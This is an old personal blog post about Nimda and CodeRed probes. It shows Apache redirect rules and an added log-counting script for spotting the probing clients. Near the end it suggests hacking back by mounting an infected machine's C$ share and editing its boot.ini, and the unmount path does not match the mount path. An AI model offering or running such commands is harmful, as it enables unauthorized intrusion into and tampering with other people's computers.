I'm about half sick of Nimda and CodeRed. I get thousands of requests a month for both. It's annoying the hell out of me. I added these to my httpd.conf file:
Redirect /scripts http://www.microsoft.com
Redirect /MSADC http://www.microsoft.com
Redirect /c http://www.microsoft.com
Redirect /d http://www.microsoft.com
Redirect /_mem_bin http://microsoft.com
Redirect /msadc http://microsoft.com
# Catch any request whose path ends in cmd.exe
RedirectMatch (.*)cmd\.exe$ http://microsoft.com$1
It seems to keep out the riffraff.
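To see which clients keep sending these probes, the access log can be checked against the same paths the redirects cover. The script below is an added example, not part of the original post; it assumes Common Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from collections import Counter

# Prefixes from the Redirect lines above; mod_alias matches whole path segments,
# so "/c" covers "/c" and "/c/..." but not "/contact.html".
PROBE_PREFIXES = ("/scripts", "/MSADC", "/msadc", "/c", "/d", "/_mem_bin")

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)')


def is_probe(target):
    """True if the request path would be caught by the redirects above."""
    path = target.split("?", 1)[0]  # the directives match the path, not the query
    if path.endswith("cmd.exe"):
        return True
    return any(path == p or path.startswith(p + "/") for p in PROBE_PREFIXES)


def probes_by_source(lines):
    """Count probe requests per client address; unparseable lines are skipped."""
    counts = Counter()
    for line in lines:
        m = CLF.match(line)
        if m and is_probe(m.group(2)):
            counts[m.group(1)] += 1
    return counts


# Constructed sample log lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Oct/2002:21:30:01 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 280',
    '192.0.2.10 - - [16/Oct/2002:21:30:02 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 280',
    '192.0.2.10 - - [16/Oct/2002:21:30:03 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 280',
    '198.51.100.7 - - [16/Oct/2002:21:31:10 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 280',
    '198.51.100.7 - - [16/Oct/2002:21:31:40 -0700] "GET /index.html HTTP/1.0" 200 5120',
    '203.0.113.5 - - [16/Oct/2002:21:32:00 -0700] "GET /contact.html HTTP/1.0" 200 1834',
    '203.0.113.5 - - [16/Oct/2002:21:32:05 -0700] "GET /downloads/ HTTP/1.0" 200 912',
    'truncated or malformed line',
]

if __name__ == "__main__":
    for host, n in probes_by_source(SAMPLE_LOG).most_common():
        print(f"{host}\t{n}")
```

The per-address counts can feed a firewall blocklist or an abuse report to the source network's operator.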
If you get a machine that really really wants into your system (I have a couple that won't leave me alone), then this might be an option for you:
mount -t smbfs password= //xx.xx.xx.xx/C$ /mnt/luser
vi /mnt/luser/boot.ini
Change the "BootDelay=" to "BootDelay=99999" and the boot message to "Run a virus scanner, asshole".
umount /mnt/dork
Note that I don't condone this sort of activity personally, but only mention it for educational purposes.
If only this could be done on my web server at hurricane.
If only...
G
Posted by G at October 16, 2002 9:36 PM